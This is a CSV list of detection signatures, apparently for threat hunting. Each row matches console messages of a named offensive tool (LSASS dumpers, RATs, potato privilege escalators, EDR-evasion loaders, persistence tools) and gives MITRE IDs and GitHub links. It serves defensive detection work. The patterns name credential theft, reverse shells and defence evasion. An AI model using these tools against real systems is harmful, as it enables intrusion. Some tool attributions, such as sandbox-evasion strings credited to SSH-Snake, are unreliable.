"*[+] The 1$a$$.exe*",".{0,1000}\[\+\]\sThe\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#content","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","13365"
"*[+] the Arbitrium-Server is running*",".{0,1000}\[\+\]\sthe\sArbitrium\-Server\sis\srunning.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#content","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","13366"
"*[+] The DLL has been injected into ngentask.exe via DLL Side-Loading*",".{0,1000}\[\+\]\sThe\sDLL\shas\sbeen\sinjected\sinto\sngentask\.exe\svia\sDLL\sSide\-Loading.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","0","#content","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","13367"
"*[+] The encrypted payload with *",".{0,1000}\[\+\]\sThe\sencrypted\spayload\swith\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","#content","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","13368"
"*[+] The scheduled task is hidden and invisible now*",".{0,1000}\[\+\]\sThe\sscheduled\stask\sis\shidden\sand\sinvisible\snow.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","13369"
"*[+] This application is injectable!*",".{0,1000}\[\+\]\sThis\sapplication\sis\sinjectable!.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#content","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13370"
"*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13371"
"*[+] Thread hijacking successful*",".{0,1000}\[\+\]\sThread\shijacking\ssuccessful.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13372"
"*[+] Token-Impersonation Loaded*",".{0,1000}\[\+\]\sToken\-Impersonation\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13373"
"*[+] Triggering name pipe access on evil PIPE *",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13374"
"*[+] Triggering name pipe access on evil PIPE*",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13375"
"*[+] Triggering name pipe access on evil PIPE*",".{0,1000}\[\+\]\sTriggering\sname\spipe\saccess\son\sevil\sPIPE.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13376"
"*[+] Unhooking the NTDLL for Process with PID *",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfor\sProcess\swith\sPID\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13377"
"*[+] Unhooking the NTDLL from PID * completed successfully.*",".{0,1000}\[\+\]\sUnhooking\sthe\sNTDLL\sfrom\sPID\s.{0,1000}\scompleted\ssuccessfully\..{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13378"
"*[+] Updated Elevated HKLM:Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon key UserInit*",".{0,1000}\[\+\]\sUpdated\sElevated\sHKLM\:Software\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Winlogon\skey\sUserInit.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#content","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","13379"
"*[+] Uploading to PS2exe and generating payload*",".{0,1000}\[\+\]\sUploading\sto\sPS2exe\sand\sgenerating\spayload.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#content","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","13380"
"*[+] UPXed successfully*",".{0,1000}\[\+\]\sUPXed\ssuccessfully.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","#content","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","13381"
"*[+] USAGE: DirtyVanity *",".{0,1000}\[\+\]\sUSAGE\:\sDirtyVanity\s.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","13382"
"*[+] Use -info to get stack status and the enpoint url of catspin*",".{0,1000}\[\+\]\sUse\s\-info\sto\sget\sstack\sstatus\sand\sthe\senpoint\surl\sof\scatspin.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","#content","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","13383"
"*[+] User * added to /etc/passwd with root privileges.*",".{0,1000}\[\+\]\sUser\s.{0,1000}\sadded\sto\s\/etc\/passwd\swith\sroot\sprivileges\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13385"
"*[+] User * has been modified to have UID 0 (root privileges).*",".{0,1000}\[\+\]\sUser\s.{0,1000}\shas\sbeen\smodified\sto\shave\sUID\s0\s\(root\sprivileges\)\..{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13386"
"*[+] User hash stolen!*",".{0,1000}\[\+\]\sUser\shash\sstolen!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","13387"
"*[+] User persistence through the new * user established!*",".{0,1000}\[\+\]\sUser\spersistence\sthrough\sthe\snew\s.{0,1000}\suser\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13388"
"*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13389"
"*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13390"
"*[+] Using DLL enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sDLL\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13391"
"*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","13392"
"*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13393"
"*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13394"
"*[+] Using domain enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\sdomain\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13395"
"*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13396"
"*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13397"
"*[+] Using hostname enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\shostname\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13398"
"*[+] Using Obfuscator-LLVM to compile stub*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13399"
"*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13400"
"*[+] Using Obfuscator-LLVM to compile stub...*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile\sstub\.\.\..{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13401"
"*[+] Using Obfuscator-LLVM to compile*",".{0,1000}\[\+\]\sUsing\sObfuscator\-LLVM\sto\scompile.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#content","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","13402"
"*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13403"
"*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13404"
"*[+] Using sleep technique for sandbox evasion*",".{0,1000}\[\+\]\sUsing\ssleep\stechnique\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13405"
"*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13406"
"*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13407"
"*[+] Using SysWhispers2 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers2\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13408"
"*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13409"
"*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13410"
"*[+] Using SysWhispers3 for syscalls*",".{0,1000}\[\+\]\sUsing\sSysWhispers3\sfor\ssyscalls.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13411"
"*[+] Using username enumeration for sandbox evasion*",".{0,1000}\[\+\]\sUsing\susername\senumeration\sfor\ssandbox\sevasion.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13412"
"*[+] Using WMI to set WMI SD*",".{0,1000}\[\+\]\sUsing\sWMI\sto\sset\sWMI\sSD.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#content","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","13413"
"*[+] v1.0 @decoder_it 2023*",".{0,1000}\[\+\]\sv1\.0\s\@decoder_it\s2023.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","13414"
"*[+] Valid login* user must enroll in MFA.*",".{0,1000}\[\+\]\sValid\slogin.{0,1000}\suser\smust\senroll\sin\sMFA\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","#content","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","13415"
"*[+] Valid shellcode execution methods are: PoolPartyModuleStomping*",".{0,1000}\[\+\]\sValid\sshellcode\sexecution\smethods\sare\:\sPoolPartyModuleStomping.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13416"
"*[+] Victim * have office365 Licence!*",".{0,1000}\[\+\]\sVictim\s.{0,1000}\shave\soffice365\sLicence!.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","#content","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","13417"
"*[+] WdFilter Altitude Registry key has been successfully deleted*",".{0,1000}\[\+\]\sWdFilter\sAltitude\sRegistry\skey\shas\sbeen\ssuccessfully\sdeleted.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","0","#content","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","13418"
"*[+] WmiExec *",".{0,1000}\[\+\]\sWmiExec\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#content","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","13419"
"*[+] WOOT! Created elevated process *",".{0,1000}\[\+\]\sWOOT!\sCreated\selevated\sprocess\s.{0,1000}","offensive_tool_keyword","SharpElevator","SharpElevator is a C# implementation of Elevator for UAC bypass","T1548.002 - T1548","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/SharpElevator","1","0","#content","N/A","10","1","51","12","2022-08-31T18:09:10Z","2022-08-29T19:52:53Z","13420"
